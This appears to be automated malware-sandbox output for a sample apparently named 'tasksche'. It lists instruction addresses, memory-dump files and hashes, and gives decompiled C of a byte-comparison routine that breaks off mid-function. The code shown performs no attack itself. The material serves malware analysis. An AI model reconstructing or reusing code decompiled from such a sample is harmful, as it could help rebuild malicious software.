                                                                                              0x00415e1b
                                                                                              0x00415e1e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00415e1e
                                                                                              0x0041632e
                                                                                              0x0041632e
                                                                                              0x0041632e
                                                                                              0x00416338
                                                                                              0x0041633e
                                                                                              0x00416344
                                                                                              0x0041634f
                                                                                              0x00416358
                                                                                              0x0041635e
                                                                                              0x00416362
                                                                                              0x00416366
                                                                                              0x00416369
                                                                                              0x00416369
                                                                                              0x0041636e
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e16
                                                                                              0x00415e19
                                                                                              0x00415e1b
                                                                                              0x00415e1e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00415e1e
                                                                                              0x00000000
                                                                                              0x00415e10
                                                                                              0x0041674a
                                                                                              0x00416750
                                                                                              0x00416759
                                                                                              0x00416764
                                                                                              0x00416767
                                                                                              0x0041676d
                                                                                              0x00416776
                                                                                              0x0041677a
                                                                                              0x0041677a
                                                                                              0x0041677f
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e16
                                                                                              0x00415e19
                                                                                              0x00415e1b
                                                                                              0x00415e1e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00415e1e
                                                                                              0x00000000
                                                                                              0x00415e10
                                                                                              0x004163b9
                                                                                              0x004163bf
                                                                                              0x004163c4
                                                                                              0x004163cc
                                                                                              0x004163d2
                                                                                              0x004163d5
                                                                                              0x004163d7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004163dd
                                                                                              0x004163df
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004163e5
                                                                                              0x004163ed
                                                                                              0x004163f0
                                                                                              0x004163f3
                                                                                              0x004163f7
                                                                                              0x004163fa
                                                                                              0x004163fd
                                                                                              0x00416400
                                                                                              0x00416457
                                                                                              0x0041645a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041645c
                                                                                              0x0041645c
                                                                                              0x0041645f
                                                                                              0x00416462
                                                                                              0x0041646a
                                                                                              0x0041646f
                                                                                              0x00416473
                                                                                              0x00416477
                                                                                              0x0041647b
                                                                                              0x0041647e
                                                                                              0x0041647e
                                                                                              0x0041647e
                                                                                              0x0041647e
                                                                                              0x00000000
                                                                                              0x00416462
                                                                                              0x00416402
                                                                                              0x00416405
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416407
                                                                                              0x00416407
                                                                                              0x0041640a
                                                                                              0x0041640d
                                                                                              0x00416410
                                                                                              0x00416412
                                                                                              0x00416414
                                                                                              0x00416418
                                                                                              0x0041641d
                                                                                              0x00416423
                                                                                              0x00416429
                                                                                              0x0041642f
                                                                                              0x00416435
                                                                                              0x0041643b
                                                                                              0x00416441
                                                                                              0x00416444
                                                                                              0x00416447
                                                                                              0x0041644a
                                                                                              0x0041644a
                                                                                              0x0041644a
                                                                                              0x0041644a
                                                                                              0x0041644f
                                                                                              0x0041644f
                                                                                              0x00416452
                                                                                              0x00000000
                                                                                              0x00416387
                                                                                              0x0041638d
                                                                                              0x00416392
                                                                                              0x00416392
                                                                                              0x00000000
                                                                                              0x00416508
                                                                                              0x00416508
                                                                                              0x00416508
                                                                                              0x00416512
                                                                                              0x00416518
                                                                                              0x0041651e
                                                                                              0x00416529
                                                                                              0x00416532
                                                                                              0x00416538
                                                                                              0x0041653c
                                                                                              0x00416540
                                                                                              0x00416543
                                                                                              0x00416543
                                                                                              0x00000000
                                                                                              0x004164ed
                                                                                              0x004164ed
                                                                                              0x004164f7
                                                                                              0x004164f7
                                                                                              0x00416500
                                                                                              0x00000000
                                                                                              0x00416500
                                                                                              0x0041648d
                                                                                              0x0041648d
                                                                                              0x00416496
                                                                                              0x00416499
                                                                                              0x00416499
                                                                                              0x00416716
                                                                                              0x00416716
                                                                                              0x00416719
                                                                                              0x0041671c
                                                                                              0x00416724
                                                                                              0x00416729
                                                                                              0x0041672d
                                                                                              0x00416731
                                                                                              0x00416735
                                                                                              0x00416738
                                                                                              0x00416738
                                                                                              0x00416738
                                                                                              0x00416738
                                                                                              0x00000000
                                                                                              0x0041673d
                                                                                              0x004166b0
                                                                                              0x004166b3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004166bc
                                                                                              0x004166bf
                                                                                              0x004166bf
                                                                                              0x004166c2
                                                                                              0x004166c5
                                                                                              0x004166c8
                                                                                              0x004166ca
                                                                                              0x004166ce
                                                                                              0x004166d3
                                                                                              0x004166d9
                                                                                              0x004166df
                                                                                              0x004166e5
                                                                                              0x004166eb
                                                                                              0x004166f1
                                                                                              0x004166f7
                                                                                              0x004166fa
                                                                                              0x004166fd
                                                                                              0x00416700
                                                                                              0x00416700
                                                                                              0x00416700
                                                                                              0x00416700
                                                                                              0x00000000
                                                                                              0x00416705
                                                                                              0x00416683
                                                                                              0x004165c1
                                                                                              0x004165c8
                                                                                              0x004165c8
                                                                                              0x004165ca
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004165cc
                                                                                              0x004165cd
                                                                                              0x004165d0
                                                                                              0x004165d3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004165d5
                                                                                              0x004165d7
                                                                                              0x00000000
                                                                                              0x004165d7
                                                                                              0x0041658d
                                                                                              0x00416590
                                                                                              0x0041659a
                                                                                              0x004165a2
                                                                                              0x004165a7
                                                                                              0x004165aa
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041655d
                                                                                              0x0041655d
                                                                                              0x00416560
                                                                                              0x00416562
                                                                                              0x00416563
                                                                                              0x00416566
                                                                                              0x00416566
                                                                                              0x00000000
                                                                                              0x0041655d
                                                                                              0x004163ae
                                                                                              0x004163ae
                                                                                              0x004163b1
                                                                                              0x004163b1
                                                                                              0x0041637a
                                                                                              0x0041637e
                                                                                              0x00416383
                                                                                              0x00416385
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416385
                                                                                              0x00415f5f
                                                                                              0x00415f64
                                                                                              0x00415f67
                                                                                              0x00415f79
                                                                                              0x00415f7f
                                                                                              0x00415f84
                                                                                              0x00415f87
                                                                                              0x00415f89
                                                                                              0x00415f8d
                                                                                              0x00415f94
                                                                                              0x00415f9a
                                                                                              0x00415fa0
                                                                                              0x00415fa8
                                                                                              0x00415faa
                                                                                              0x00415faa
                                                                                              0x00415fad
                                                                                              0x00415fad
                                                                                              0x00415f69
                                                                                              0x00415f6c
                                                                                              0x00415f6c
                                                                                              0x00415fb5
                                                                                              0x00415fb8
                                                                                              0x00415fbd
                                                                                              0x00415fc3
                                                                                              0x00415fc8
                                                                                              0x00415fcf
                                                                                              0x00415ffa
                                                                                              0x00415ffb
                                                                                              0x00416002
                                                                                              0x00416005
                                                                                              0x00416020
                                                                                              0x00416023
                                                                                              0x0041602d
                                                                                              0x0041602f
                                                                                              0x00416035
                                                                                              0x0041603f
                                                                                              0x00416044
                                                                                              0x0041604b
                                                                                              0x00416051
                                                                                              0x00416053
                                                                                              0x00416053
                                                                                              0x00416053
                                                                                              0x00416055
                                                                                              0x00000000
                                                                                              0x00416055
                                                                                              0x00416007
                                                                                              0x0041600e
                                                                                              0x0041600e
                                                                                              0x00416010
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416012
                                                                                              0x00416013
                                                                                              0x00416016
                                                                                              0x00416019
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041601b
                                                                                              0x0041601d
                                                                                              0x00000000
                                                                                              0x00415fd1
                                                                                              0x00415fd3
                                                                                              0x00415fd6
                                                                                              0x00415fe0
                                                                                              0x00415fe8
                                                                                              0x00415fed
                                                                                              0x00415ff0
                                                                                              0x0041605d
                                                                                              0x0041605d
                                                                                              0x00416060
                                                                                              0x00416072
                                                                                              0x00416078
                                                                                              0x0041607c
                                                                                              0x0041607f
                                                                                              0x00416081
                                                                                              0x00416190
                                                                                              0x00416190
                                                                                              0x00416193
                                                                                              0x00416199
                                                                                              0x0041619f
                                                                                              0x004161a2
                                                                                              0x004161a8
                                                                                              0x004161aa
                                                                                              0x004161ad
                                                                                              0x004161b3
                                                                                              0x004161b5
                                                                                              0x004161b5
                                                                                              0x004161b5
                                                                                              0x004161b5
                                                                                              0x004161b3
                                                                                              0x004161a8
                                                                                              0x004161bb
                                                                                              0x004161c1
                                                                                              0x004161c7
                                                                                              0x004161ca
                                                                                              0x004161cd
                                                                                              0x004161d0
                                                                                              0x004161d3
                                                                                              0x004161d8
                                                                                              0x004161da
                                                                                              0x004161e3
                                                                                              0x004161e9
                                                                                              0x004161ec
                                                                                              0x004161ee
                                                                                              0x00000000
                                                                                              0x004161f4
                                                                                              0x004161f4
                                                                                              0x004161f6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004161fc
                                                                                              0x00416204
                                                                                              0x00416207
                                                                                              0x0041620a
                                                                                              0x0041620e
                                                                                              0x00416211
                                                                                              0x00416214
                                                                                              0x00416217
                                                                                              0x00416274
                                                                                              0x00416277
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041627c
                                                                                              0x0041627c
                                                                                              0x0041627f
                                                                                              0x00416282
                                                                                              0x0041628a
                                                                                              0x0041628f
                                                                                              0x00416293
                                                                                              0x00416297
                                                                                              0x0041629b
                                                                                              0x0041629e
                                                                                              0x0041629e
                                                                                              0x0041629e
                                                                                              0x0041629e
                                                                                              0x00000000
                                                                                              0x00416282
                                                                                              0x00416219
                                                                                              0x0041621c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416224
                                                                                              0x00416224
                                                                                              0x00416227
                                                                                              0x0041622a
                                                                                              0x0041622d
                                                                                              0x0041622f
                                                                                              0x00416231
                                                                                              0x00416235
                                                                                              0x00416237
                                                                                              0x0041623a
                                                                                              0x0041623d
                                                                                              0x00416240
                                                                                              0x00416243
                                                                                              0x00416246
                                                                                              0x00416249
                                                                                              0x0041624c
                                                                                              0x0041624f
                                                                                              0x00416252
                                                                                              0x00416255
                                                                                              0x00416258
                                                                                              0x0041625b
                                                                                              0x0041625e
                                                                                              0x00416261
                                                                                              0x00416264
                                                                                              0x00416267
                                                                                              0x00416267
                                                                                              0x00416267
                                                                                              0x00416267
                                                                                              0x0041626c
                                                                                              0x0041626f
                                                                                              0x00000000
                                                                                              0x0041626f
                                                                                              0x004161ee
                                                                                              0x00416087
                                                                                              0x0041608a
                                                                                              0x0041616d
                                                                                              0x00416174
                                                                                              0x0041617a
                                                                                              0x00416180
                                                                                              0x00416188
                                                                                              0x0041618a
                                                                                              0x0041618a
                                                                                              0x0041618d
                                                                                              0x00000000
                                                                                              0x0041618d
                                                                                              0x00416090
                                                                                              0x00416094
                                                                                              0x0041609b
                                                                                              0x004160a0
                                                                                              0x004160a8
                                                                                              0x004160b1
                                                                                              0x004160b7
                                                                                              0x004160b9
                                                                                              0x004160b9
                                                                                              0x004160bc
                                                                                              0x004160bc
                                                                                              0x004160c1
                                                                                              0x004160c6
                                                                                              0x004160cc
                                                                                              0x004160d1
                                                                                              0x004160d8
                                                                                              0x00416103
                                                                                              0x00416104
                                                                                              0x0041610b
                                                                                              0x0041610e
                                                                                              0x00416129
                                                                                              0x0041612c
                                                                                              0x00416136
                                                                                              0x00416138
                                                                                              0x0041613e
                                                                                              0x00416148
                                                                                              0x0041614d
                                                                                              0x00416154
                                                                                              0x0041615a
                                                                                              0x0041615c
                                                                                              0x0041615c
                                                                                              0x0041615c
                                                                                              0x0041615e
                                                                                              0x00000000
                                                                                              0x0041615e
                                                                                              0x00416110
                                                                                              0x00416117
                                                                                              0x00416117
                                                                                              0x00416119
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041611b
                                                                                              0x0041611c
                                                                                              0x0041611f
                                                                                              0x00416122
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416124
                                                                                              0x00416126
                                                                                              0x00000000
                                                                                              0x004160da
                                                                                              0x004160dc
                                                                                              0x004160df
                                                                                              0x004160e9
                                                                                              0x004160f1
                                                                                              0x004160f6
                                                                                              0x004160f9
                                                                                              0x00416166
                                                                                              0x00416166
                                                                                              0x00000000
                                                                                              0x00416166
                                                                                              0x004160d8
                                                                                              0x00416063
                                                                                              0x00000000
                                                                                              0x00416063
                                                                                              0x00415fcf
                                                                                              0x00415f49
                                                                                              0x00415f4c
                                                                                              0x00000000
                                                                                              0x00415f4c
                                                                                              0x00415eed
                                                                                              0x00415ef1
                                                                                              0x00415ef1
                                                                                              0x00415ef3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00415ef5
                                                                                              0x00415ef6
                                                                                              0x00415ef9
                                                                                              0x00415efc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00415efe
                                                                                              0x00415f00
                                                                                              0x00000000
                                                                                              0x00415f00
                                                                                              0x00415eb9
                                                                                              0x00415ebc
                                                                                              0x00415ec6
                                                                                              0x00415ece
                                                                                              0x00415ed3
                                                                                              0x00415ed6
                                                                                              0x00000000
                                                                                              0x00415ed6
                                                                                              0x00415e6a
                                                                                              0x00415e70
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00415e74
                                                                                              0x00415e7f
                                                                                              0x00415e85
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00415e8b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00415e93
                                                                                              0x00415e99
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00415e99
                                                                                              0x00415de2
                                                                                              0x00415de2
                                                                                              0x00415de9
                                                                                              0x00415de9
                                                                                              0x0041639c
                                                                                              0x00000000
                                                                                              0x0041639c
                                                                                              0x00415dad
                                                                                              0x00415db9
                                                                                              0x00415dbd
                                                                                              0x00415dc4
                                                                                              0x00000000
                                                                                              0x00415dc6
                                                                                              0x00415dc6
                                                                                              0x00000000
                                                                                              0x00415dc6
                                                                                              0x00415dc4

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 55f74d88c168b2656ab75066bc4e011c1757566443c1fcad1fbcf06b528a1986
                                                                                              • Instruction ID: 136bcfac07b0c46142f126060f48d767d5d9002a5a6c7f55271a6c6e067ee92a
                                                                                              • Opcode Fuzzy Hash: 55f74d88c168b2656ab75066bc4e011c1757566443c1fcad1fbcf06b528a1986
                                                                                              • Instruction Fuzzy Hash: 8C72B070A04645DFCB19CF68C5806EDBBB1FF45308F2981AED8598B742C339E991CB59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0041BCD9(void* __eax, void* __ecx) {
                                                                                              				void* _t196;
                                                                                              				signed int _t197;
                                                                                              				void* _t200;
                                                                                              				signed char _t206;
                                                                                              				signed char _t207;
                                                                                              				signed char _t208;
                                                                                              				signed char _t210;
                                                                                              				signed char _t211;
                                                                                              				signed int _t216;
                                                                                              				signed int _t316;
                                                                                              				void* _t319;
                                                                                              				void* _t321;
                                                                                              				void* _t323;
                                                                                              				void* _t325;
                                                                                              				void* _t327;
                                                                                              				void* _t330;
                                                                                              				void* _t332;
                                                                                              				void* _t334;
                                                                                              				void* _t337;
                                                                                              				void* _t339;
                                                                                              				void* _t341;
                                                                                              				void* _t344;
                                                                                              				void* _t346;
                                                                                              				void* _t348;
                                                                                              				void* _t351;
                                                                                              				void* _t353;
                                                                                              				void* _t355;
                                                                                              				void* _t358;
                                                                                              				void* _t360;
                                                                                              				void* _t362;
                                                                                              
                                                                                              				_t200 = __ecx;
                                                                                              				_t196 = __eax;
                                                                                              				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
                                                                                              					_t316 = 0;
                                                                                              					L17:
                                                                                              					if(_t316 != 0) {
                                                                                              						goto L1;
                                                                                              					}
                                                                                              					_t206 =  *(_t196 - 0x1b);
                                                                                              					if(_t206 ==  *(_t200 - 0x1b)) {
                                                                                              						_t316 = 0;
                                                                                              						L28:
                                                                                              						if(_t316 != 0) {
                                                                                              							goto L1;
                                                                                              						}
                                                                                              						_t207 =  *(_t196 - 0x17);
                                                                                              						if(_t207 ==  *(_t200 - 0x17)) {
                                                                                              							_t316 = 0;
                                                                                              							L39:
                                                                                              							if(_t316 != 0) {
                                                                                              								goto L1;
                                                                                              							}
                                                                                              							_t208 =  *(_t196 - 0x13);
                                                                                              							if(_t208 ==  *(_t200 - 0x13)) {
                                                                                              								_t316 = 0;
                                                                                              								L50:
                                                                                              								if(_t316 != 0) {
                                                                                              									goto L1;
                                                                                              								}
                                                                                              								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
                                                                                              									_t316 = 0;
                                                                                              									L61:
                                                                                              									if(_t316 != 0) {
                                                                                              										goto L1;
                                                                                              									}
                                                                                              									_t210 =  *(_t196 - 0xb);
                                                                                              									if(_t210 ==  *(_t200 - 0xb)) {
                                                                                              										_t316 = 0;
                                                                                              										L72:
                                                                                              										if(_t316 != 0) {
                                                                                              											goto L1;
                                                                                              										}
                                                                                              										_t211 =  *(_t196 - 7);
                                                                                              										if(_t211 ==  *(_t200 - 7)) {
                                                                                              											_t316 = 0;
                                                                                              											L83:
                                                                                              											if(_t316 != 0) {
                                                                                              												goto L1;
                                                                                              											}
                                                                                              											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
                                                                                              											if(_t319 == 0) {
                                                                                              												L5:
                                                                                              												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
                                                                                              												if(_t321 == 0) {
                                                                                              													L3:
                                                                                              													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
                                                                                              													if(_t197 != 0) {
                                                                                              														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
                                                                                              													}
                                                                                              													L2:
                                                                                              													return _t197;
                                                                                              												}
                                                                                              												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                                                                                              												if(_t216 != 0) {
                                                                                              													L86:
                                                                                              													_t197 = _t216;
                                                                                              													goto L2;
                                                                                              												} else {
                                                                                              													goto L3;
                                                                                              												}
                                                                                              											}
                                                                                              											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
                                                                                              											if(_t216 == 0) {
                                                                                              												goto L5;
                                                                                              											}
                                                                                              											goto L86;
                                                                                              										}
                                                                                              										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
                                                                                              										if(_t323 == 0) {
                                                                                              											L76:
                                                                                              											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
                                                                                              											if(_t325 == 0) {
                                                                                              												L78:
                                                                                              												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
                                                                                              												if(_t327 == 0) {
                                                                                              													L80:
                                                                                              													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
                                                                                              													if(_t316 != 0) {
                                                                                              														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                              													}
                                                                                              													goto L83;
                                                                                              												}
                                                                                              												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
                                                                                              												if(_t316 != 0) {
                                                                                              													goto L1;
                                                                                              												}
                                                                                              												goto L80;
                                                                                              											}
                                                                                              											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                                                                                              											if(_t316 != 0) {
                                                                                              												goto L1;
                                                                                              											}
                                                                                              											goto L78;
                                                                                              										}
                                                                                              										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                                                                                              										if(_t316 != 0) {
                                                                                              											goto L1;
                                                                                              										}
                                                                                              										goto L76;
                                                                                              									}
                                                                                              									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
                                                                                              									if(_t330 == 0) {
                                                                                              										L65:
                                                                                              										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
                                                                                              										if(_t332 == 0) {
                                                                                              											L67:
                                                                                              											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
                                                                                              											if(_t334 == 0) {
                                                                                              												L69:
                                                                                              												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
                                                                                              												if(_t316 != 0) {
                                                                                              													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                              												}
                                                                                              												goto L72;
                                                                                              											}
                                                                                              											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
                                                                                              											if(_t316 != 0) {
                                                                                              												goto L1;
                                                                                              											}
                                                                                              											goto L69;
                                                                                              										}
                                                                                              										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
                                                                                              										if(_t316 != 0) {
                                                                                              											goto L1;
                                                                                              										}
                                                                                              										goto L67;
                                                                                              									}
                                                                                              									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
                                                                                              									if(_t316 != 0) {
                                                                                              										goto L1;
                                                                                              									}
                                                                                              									goto L65;
                                                                                              								}
                                                                                              								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
                                                                                              								if(_t337 == 0) {
                                                                                              									L54:
                                                                                              									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
                                                                                              									if(_t339 == 0) {
                                                                                              										L56:
                                                                                              										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
                                                                                              										if(_t341 == 0) {
                                                                                              											L58:
                                                                                              											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
                                                                                              											if(_t316 != 0) {
                                                                                              												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                              											}
                                                                                              											goto L61;
                                                                                              										}
                                                                                              										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
                                                                                              										if(_t316 != 0) {
                                                                                              											goto L1;
                                                                                              										}
                                                                                              										goto L58;
                                                                                              									}
                                                                                              									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
                                                                                              									if(_t316 != 0) {
                                                                                              										goto L1;
                                                                                              									}
                                                                                              									goto L56;
                                                                                              								}
                                                                                              								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
                                                                                              								if(_t316 != 0) {
                                                                                              									goto L1;
                                                                                              								}
                                                                                              								goto L54;
                                                                                              							}
                                                                                              							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
                                                                                              							if(_t344 == 0) {
                                                                                              								L43:
                                                                                              								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
                                                                                              								if(_t346 == 0) {
                                                                                              									L45:
                                                                                              									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
                                                                                              									if(_t348 == 0) {
                                                                                              										L47:
                                                                                              										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
                                                                                              										if(_t316 != 0) {
                                                                                              											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                              										}
                                                                                              										goto L50;
                                                                                              									}
                                                                                              									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
                                                                                              									if(_t316 != 0) {
                                                                                              										goto L1;
                                                                                              									}
                                                                                              									goto L47;
                                                                                              								}
                                                                                              								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
                                                                                              								if(_t316 != 0) {
                                                                                              									goto L1;
                                                                                              								}
                                                                                              								goto L45;
                                                                                              							}
                                                                                              							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
                                                                                              							if(_t316 != 0) {
                                                                                              								goto L1;
                                                                                              							}
                                                                                              							goto L43;
                                                                                              						}
                                                                                              						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
                                                                                              						if(_t351 == 0) {
                                                                                              							L32:
                                                                                              							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
                                                                                              							if(_t353 == 0) {
                                                                                              								L34:
                                                                                              								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
                                                                                              								if(_t355 == 0) {
                                                                                              									L36:
                                                                                              									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
                                                                                              									if(_t316 != 0) {
                                                                                              										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                              									}
                                                                                              									goto L39;
                                                                                              								}
                                                                                              								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
                                                                                              								if(_t316 != 0) {
                                                                                              									goto L1;
                                                                                              								}
                                                                                              								goto L36;
                                                                                              							}
                                                                                              							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
                                                                                              							if(_t316 != 0) {
                                                                                              								goto L1;
                                                                                              							}
                                                                                              							goto L34;
                                                                                              						}
                                                                                              						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
                                                                                              						if(_t316 != 0) {
                                                                                              							goto L1;
                                                                                              						}
                                                                                              						goto L32;
                                                                                              					}
                                                                                              					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
                                                                                              					if(_t358 == 0) {
                                                                                              						L21:
                                                                                              						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
                                                                                              						if(_t360 == 0) {
                                                                                              							L23:
                                                                                              							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
                                                                                              							if(_t362 == 0) {
                                                                                              								L25:
                                                                                              								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
                                                                                              								if(_t316 != 0) {
                                                                                              									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                              								}
                                                                                              								goto L28;
                                                                                              							}
                                                                                              							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
                                                                                              							if(_t316 != 0) {
                                                                                              								goto L1;
                                                                                              							}
                                                                                              							goto L25;
                                                                                              						}
                                                                                              						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
                                                                                              						if(_t316 != 0) {
                                                                                              							goto L1;
                                                                                              						}
                                                                                              						goto L23;
                                                                                              					}
                                                                                              					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
                                                                                              					if(_t316 != 0) {
                                                                                              						goto L1;
                                                                                              					}
                                                                                              					goto L21;
                                                                                              				} else {
                                                                                              					__edx =  *(__ecx - 0x1f) & 0x000000ff;
                                                                                              					__esi =  *(__eax - 0x1f) & 0x000000ff;
                                                                                              					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
                                                                                              					if(__esi == 0) {
                                                                                              						L10:
                                                                                              						__esi =  *(__eax - 0x1e) & 0x000000ff;
                                                                                              						__edx =  *(__ecx - 0x1e) & 0x000000ff;
                                                                                              						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                                                                                              						if(__esi == 0) {
                                                                                              							L12:
                                                                                              							__esi =  *(__eax - 0x1d) & 0x000000ff;
                                                                                              							__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                              							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
